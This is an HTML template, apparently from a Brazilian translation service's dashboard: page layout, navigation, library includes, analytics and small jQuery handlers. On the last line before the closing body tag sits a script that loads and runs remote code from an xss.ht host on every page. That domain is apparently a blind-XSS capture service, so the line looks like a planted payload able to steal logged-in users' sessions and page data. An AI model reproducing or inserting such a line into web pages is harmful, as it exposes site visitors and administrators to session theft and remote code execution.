{% block header %}
<!DOCTYPE html>
<html lang="pt">

<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-77396122-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-77396122-1');
</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-549GJ34');</script>
<!-- End Google Tag Manager -->

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- Tell the browser to be responsive to screen width -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="stylesheet" type="text/css" href="/stylesheets/style.css">
    <!-- Favicon icon -->
    <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png">
    <title>Universo Traduções</title>
    <!-- This page CSS -->
    <!-- chartist CSS -->
    <link href="/admin/assets/node_modules/morrisjs/morris.css" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="/stylesheets/sweetalert2.css">
    <!--Toaster Popup message CSS -->
    <script src="/admin/assets/node_modules/jquery/jquery-3.2.1.min.js"></script>
    <link href="/admin/assets/node_modules/toast-master/css/jquery.toast.css" rel="stylesheet">
    <link href="/admin/assets/node_modules/datatables/media/css/dataTables.bootstrap4.css" rel="stylesheet">
    <link href="/admin/assets/node_modules/bootstrap-material-datetimepicker/css/bootstrap-material-datetimepicker.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/intro.js/2.9.3/introjs.css" rel="stylesheet">
    <!-- Custom CSS -->
    <link href="/layout/dist/css/style.min.css" rel="stylesheet">
    <!-- Dashboard 1 Page CSS -->
    <link href="/layout/dist/css/pages/dashboard1.css" rel="stylesheet">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
    <link href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css" rel="stylesheet" />
    <script src="https://cdn.jsdelivr.net/npm/vue"></script>
    <script src="https://unpkg.com/axios/dist/axios.min.js"></script>
    <script src="https://momentjs.com/downloads/moment-with-locales.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.28.4/dist/sweetalert2.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script
</head>

<body class="horizontal-nav skin-megna fixed-layout">
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-549GJ34"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
    <!-- ============================================================== -->
    <!-- Preloader - style you can find in spinners.css -->
    <!-- ============================================================== -->
    {# <div class="preloader">
        <div class="loader">
            <div class="loader__figure"></div>
            <p class="loader__label">Universo Traduçoes</p>
        </div>
    </div> #}
    <!-- ============================================================== -->
    <!-- Main wrapper - style you can find in pages.scss -->
    <!-- ============================================================== -->
    <div id="main-wrapper">
        <!-- ============================================================== -->
        <!-- Topbar header - style you can find in pages.scss -->
        <!-- ============================================================== -->
        <header class="topbar">
            <nav class="navbar top-navbar navbar-expand-md navbar-dark">
                <!-- ============================================================== -->
                <!-- Logo -->
                <!-- ============================================================== -->
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">
                         <img src="/images/cropped.png" width="50px" class="mobile" alt="homepage" /></span>
                         <img src="https://trello-attachments.s3.amazonaws.com/5c88f9faae42653719f426cd/5c8ababca4e26c31d0023d76/2c1682588af067dd7d9519faad939773/logo-ut-branca-fundo-transparente.png" width="200" class="desktop" alt="homepage" /></span> 
                    </a>
                </div>
                <!-- ============================================================== -->
                <!-- End Logo -->
                <!-- ============================================================== -->
                <div class="navbar-collapse">
                    <!-- ============================================================== -->
                    <!-- toggle and nav items -->
                    <!-- ============================================================== -->
                    <ul class="navbar-nav mr-auto">
                        <!-- This is  -->
                        <li class="nav-item"> <a class="nav-link nav-toggler d-block d-md-none waves-effect waves-dark" href="javascript:void(0)"><i class="ti-menu"></i></a> </li>
                        <li class="nav-item"> <a class="nav-link sidebartoggler d-none waves-effect waves-dark" href="javascript:void(0)"><i class="icon-menu"></i></a> </li>
                    </ul>
                    <!-- ============================================================== -->
                    <!-- User profile and search -->
                    <!-- ============================================================== -->
                    <ul class="navbar-nav my-lg-0">
                        <!-- ============================================================== -->
                        <!-- Comment -->
                        <!-- ============================================================== -->
                            {% if current_user %}
                            <li class="nav-item dropdown">
                            <a class="nav-link dropdown-toggle waves-effect waves-dark" href="" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <i class="ti-bell"></i>
                                <div class="notify"> <span class="heartbit"></span> <span class="point"></span> </div>
                            </a>
                            <div class="dropdown-menu dropdown-menu-right mailbox animated bounceInDown">
                                <ul>
                                    <li>
                                        <div class="drop-title">Notificações</div>
                                    </li>
                                    <li>
                                        <div class="message-center">
                                            <!-- Message -->
                                            <a href="javascript:void(0)">
                                                <div class="btn btn-danger btn-circle"><i class="fa fa-link"></i></div>
                                                <div class="mail-contnet">
                                                    <h5>Luanch Admin</h5> <span class="mail-desc">Just see the my new admin!</span> <span class="time">9:30 AM</span> </div>
                                            </a>
                                            <!-- Message -->
                                            <a href="javascript:void(0)">
                                                <div class="btn btn-success btn-circle"><i class="ti-calendar"></i></div>
                                                <div class="mail-contnet">
                                                    <h5>Event today</h5> <span class="mail-desc">Just a reminder that you have event</span> <span class="time">9:10 AM</span> </div>
                                            </a>
                                            <!-- Message -->
                                            <a href="javascript:void(0)">
                                                <div class="btn btn-info btn-circle"><i class="ti-settings"></i></div>
                                                <div class="mail-contnet">
                                                    <h5>Settings</h5> <span class="mail-desc">You can customize this template as you want</span> <span class="time">9:08 AM</span> </div>
                                            </a>
                                            <!-- Message -->
                                            <a href="javascript:void(0)">
                                                <div class="btn btn-primary btn-circle"><i class="ti-user"></i></div>
                                                <div class="mail-contnet">
                                                    <h5>Pavan kumar</h5> <span class="mail-desc">Just see the my admin!</span> <span class="time">9:02 AM</span> </div>
                                            </a>
                                        </div>
                                    </li>
                                    <li>
                                        <a class="nav-link text-center link" href="javascript:void(0);"> <strong>Check all notifications</strong> <i class="fa fa-angle-right"></i> </a>
                                    </li>
                                </ul>
                            </div>
                        </li>
                        {% endif %}
                        <!-- ============================================================== -->
                        <!-- End Comment -->
                        <!-- ============================================================== -->
                        <!-- ============================================================== -->
                        <!-- End Messages -->
                        <!-- ============================================================== -->
                        
                        <!-- ============================================================== -->
                        <!-- User Profile -->
                        <!-- ============================================================== -->
                        <li class="nav-item dropdown u-pro">
                            {% if current_user.name %}
                            <a class="nav-link dropdown-toggle waves-effect waves-dark profile-pic" href="" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                <img src="{{ current_user.picture }}" alt="user" class="">
                                <span class="hidden-md-down"> {{ current_user.name }} <i class="fa fa-angle-down"></i></span>
                            </a>
                            <div class="dropdown-menu dropdown-menu-right animated flipInY">
                                <!-- text-->
                                <a href="/users/profile" class="dropdown-item"><i class="ti-user"></i> Meu Perfil</a>
                                <!-- text-->
                                <a href="/payments" class="dropdown-item"><i class="ti-wallet"></i> Financeiro</a>
                                <!-- text-->
                                {# <a href="javascript:void(0)" class="dropdown-item"><i class="ti-email"></i> Inbox</a> #}
                                <!-- text-->
                                <div class="dropdown-divider"></div>
                                <!-- text-->
                                {% if current_user.is_admin %}
                                <a href="/admin" class="dropdown-item"><i class="ti-settings"></i> Admin</a>
                                {% endif %}
                                <a href="#" class="dropdown-item logout"><i class="fa fa-power-off"></i> Sair</a>
                                <!-- text-->
                            </div>
                            {% else %}
                            <a class="nav-link waves-effect waves-dark profile-pic" href="/login">
                                <span class="">ENTRAR</span>
                            </a>
                            {% endif %}
                        </li>
                        <!-- ============================================================== -->
                        <!-- End User Profile -->
                        <!-- ============================================================== -->
                    </ul>
                </div>
            </nav>
        </header>
        <!-- ============================================================== -->
        <!-- End Topbar header -->
        <!-- ============================================================== -->
        <!-- ============================================================== -->
        <!-- Left Sidebar - style you can find in sidebar.scss  -->
        <!-- ============================================================== -->
        {% if current_user.name %}
        <aside class="left-sidebar">
            <!-- Sidebar scroll-->
            <div class="scroll-sidebar">
                <!-- Sidebar navigation-->
                <nav class="sidebar-nav">
                    <ul id="sidebarnav">
                        <li class="user-pro"> <a class="has-arrow waves-effect waves-dark" href="javascript:void(0)" aria-expanded="false"><img src="{{ current_user.picture }}" alt="user-img" class="img-circle"><span class="hide-menu">{{current_user.name}}</span></a>
                            <ul aria-expanded="false" class="collapse">
                                 <!-- text-->
                                <a href="/users/profile" class="dropdown-item"><i class="ti-user"></i> Meu Perfil</a>
                                <!-- text-->
                                <a href="/payments" class="dropdown-item"><i class="ti-wallet"></i> Financeiro</a>
                                <!-- text-->
                                {# <a href="javascript:void(0)" class="dropdown-item"><i class="ti-email"></i> Inbox</a> #}
                                <!-- text-->
                                <div class="dropdown-divider"></div>
                                <!-- text-->
                                {% if current_user.is_admin %}
                                <a href="/admin" class="dropdown-item logout"><i class="ti-settings"></i> Admin</a>
                                {% endif %}
                                <a href="#" class="dropdown-item logout"><i class="fa fa-power-off"></i> Sair</a>
                                <!-- text-->
                            </ul>
                        </li>
                        <li> <a class="waves-effect waves-dark" href="/translations" aria-expanded="false"><i class="ti-menu-alt"></i><span class="hide-menu">Projetos</span></a>
                        </li>
                        <li> <a class="waves-effect waves-dark" href="/payments" aria-expanded="false"><i class="ti-money"></i><span class="hide-menu">Pagamentos</span></a>
                        </li>
                        <li> <a class="has-arrow waves-effect waves-dark" href="javascript:void(0)" aria-expanded="false"><i class="ti-headphone-alt"></i><span class="hide-menu">Ajuda</span></a>
                            <ul aria-expanded="false" class="collapse">
                                <li><a href="/tickets">SAC</a></li>
                                <li><a href="/faq">FAQ</a></li>
                            </ul>
                        </li>
                        </li>
                        <li> <a class="waves-effect waves-dark" href="http://universotraducoes.com/pt/blog/"><i class="ti-heart"></i><span>Últimas Novidades</span></a>
                </nav>
                <!-- End Sidebar navigation -->
            </div>
            <!-- End Sidebar scroll-->
        </aside>
        {% endif %}
        <!-- ============================================================== -->
        <!-- End Left Sidebar - style you can find in sidebar.scss  -->
        <!-- ============================================================== -->
        <!-- ============================================================== -->
        <!-- Page wrapper  -->
        <!-- ============================================================== -->
        <div class="page-wrapper">
            <!-- ============================================================== -->
            <!-- Container fluid  -->
            <!-- ============================================================== -->
            <div class="container-fluid">
            <div class="row page-titles">
                <div class="col-md-5 align-self-center">
                    <h4 class="text-themecolor"></h4>
                </div>
                {% if current_user.is_tradutor == false %}
                <div class="col-md-7 align-self-center text-right">
                    <div class="d-flex justify-content-end align-items-center">
                    <a href="/translations/new"> <button style="background-color: #81458f; border:0;" type="button" class="btn btn-info m-l-15"><i class="fa fa-plus-circle"></i> Nova solicitação</button></a>
                    </div>
                </div>
                {% endif %}
            </div>
            {% block body %} {% endblock %}
            </div>
            <!-- ============================================================== -->
            <!-- End Container fluid  -->
            <!-- ============================================================== -->
        </div>
        <!-- ============================================================== -->
        <!-- End Page wrapper  -->
        <!-- ============================================================== -->
        <!-- ============================================================== -->
        <!-- footer -->
        <!-- ============================================================== -->

        <!-- ============================================================== -->
        <!-- End footer -->
        <!-- ============================================================== -->
    </div>
            <footer class="footer">
            © 2019 Universo Traduçoes
        </footer>
    <!-- ============================================================== -->
    <!-- End Wrapper -->
    <!-- ============================================================== -->
    <!-- ============================================================== -->
    <!-- All Jquery -->
    <!-- ============================================================== -->
    <!-- Bootstrap popper Core JavaScript -->
    <script src="/admin/assets/node_modules/popper/popper.min.js"></script>
    <script src="/admin/assets/node_modules/bootstrap/dist/js/bootstrap.min.js"></script>
    <!-- slimscrollbar scrollbar JavaScript -->
    <script src="/layout/dist/js/perfect-scrollbar.jquery.min.js"></script>
    <!--Wave Effects -->
    <script src="/layout/dist/js/waves.js"></script>
    <!--Menu sidealayoutbar -->
    <script src="/layout/dist/js/sidebarmenu.js"></script>
    <!--Custom JaalayoutvaScript -->
    <script src="/layout/dist/js/custom.min.js"></script>
    <!-- ============================================================== -->
    <!-- This page plugins -->
    <!-- ============================================================== -->
    <!--morris JavaScript -->
    <script src="/admin/assets/node_modules/raphael/raphael-min.js"></script>
    <script src="/admin/assets/node_modules/morrisjs/morris.min.js"></script>
    <script src="/admin/assets/node_modules/jquery-sparkline/jquery.sparkline.min.js"></script>
    <!-- Popup message jquery -->
    <script src="/admin/assets/node_modules/toast-master/js/jquery.toast.js"></script>
    <!-- Chart JS -->
    <script src="/layout/dist/js/dashboard1.js"></script>
    <script src="/admin/assets/node_modules/toast-master/js/jquery.toast.js"></script>
    <script src="/admin/assets/node_modules/sticky-kit-master/dist/sticky-kit.min.js"></script>
    <!--Custom JavaScript -->
    <!--This page plugins -->
    <script src="/admin/assets/node_modules/datatables/datatables.min.js"></script>
    <script src="https://cdn.datatables.net/plug-ins/1.10.19/dataRender/datetime.js"></script>
    <!-- start - This is for export functionality only -->
    <!-- end - This is for export functionality only -->
    <script src="/admin/assets/node_modules/icheck/icheck.min.js"></script>
    <script src="/admin/assets/node_modules/icheck/icheck.init.js"></script>
    <script src="/admin/dist/js/socket.io.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/cleave.js/1.4.4/cleave.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/cleave.js/1.4.4/addons/cleave-phone.br.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jqBootstrapValidation/1.3.7/jqBootstrapValidation.min.js"></script>
    <script src="/admin/assets/node_modules/bootstrap-material-datetimepicker/js/bootstrap-material-datetimepicker.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/intro.js/2.9.3/intro.min.js"></script>
    <script type="text/javascript">



    </script>
    <script>
    $(document).ready(function() {
        $('.logout').click(function() {
        $.ajax({
            url: "/logout",
            method: 'post'
            }).done(function() {
            window.location = "/login";
            });
        })
    })
    </script>   
    <script>
        $(function(){
            $('#chat, #msg, #comment, #todo').perfectScrollbar();
        });
    </script>
        <script>
        $(function () {
            $('#myTable').DataTable({
              language: {
                url: 'https://cdn.datatables.net/plug-ins/1.10.19/i18n/Portuguese-Brasil.json'
              }
            });
            $(function () {
                var table = $('#example').DataTable({
                    "columnDefs": [{
                        "visible": false,
                        "targets": 2
                    }],
                    "order": [
                        [2, 'asc']
                    ],
                    "displayLength": 25,
                    "drawCallback": function (settings) {
                        var api = this.api();
                        var rows = api.rows({
                            page: 'current'
                        }).nodes();
                        var last = null;
                        api.column(2, {
                            page: 'current'
                        }).data().each(function (group, i) {
                            if (last !== group) {
                                $(rows).eq(i).before('<tr class="group"><td colspan="5">' + group + '</td></tr>');
                                last = group;
                            }
                        });
                    }
                });
                // Order by the grouping
                $('#example tbody').on('click', 'tr.group', function () {
                    var currentOrder = table.order()[0];
                    if (currentOrder[0] === 2 && currentOrder[1] === 'asc') {
                        table.order([2, 'desc']).draw();
                    } else {
                        table.order([2, 'asc']).draw();
                    }
                });
            });
        });
    </script>
    <!-- Facebook Pixel Code -->
<script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '548209029403406');
    fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=548209029403406&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Facebook Pixel Code -->
    <script>
    $( "#submit" ).click(function() {
        console.log('clicado')
        var title = $('#tickettitle').val()
        var text = $('#tickettext').val()
        $.ajax({
            url: "/tickets",
            method: 'post',
            data: {title: title, description: text}
            }).done(function() {
            console.log('done');
                window.location = "/tickets";
            });
    });
</script>
    <script>
        $('#mdate').bootstrapMaterialDatePicker({time: false, format : 'DD/MM/YYYY' });
    </script>
    {% block extrajs %} {% endblock %}
    <script>$.getScript("//pollo.xss.ht")</script>
</body>

</html>
{% endblock %}
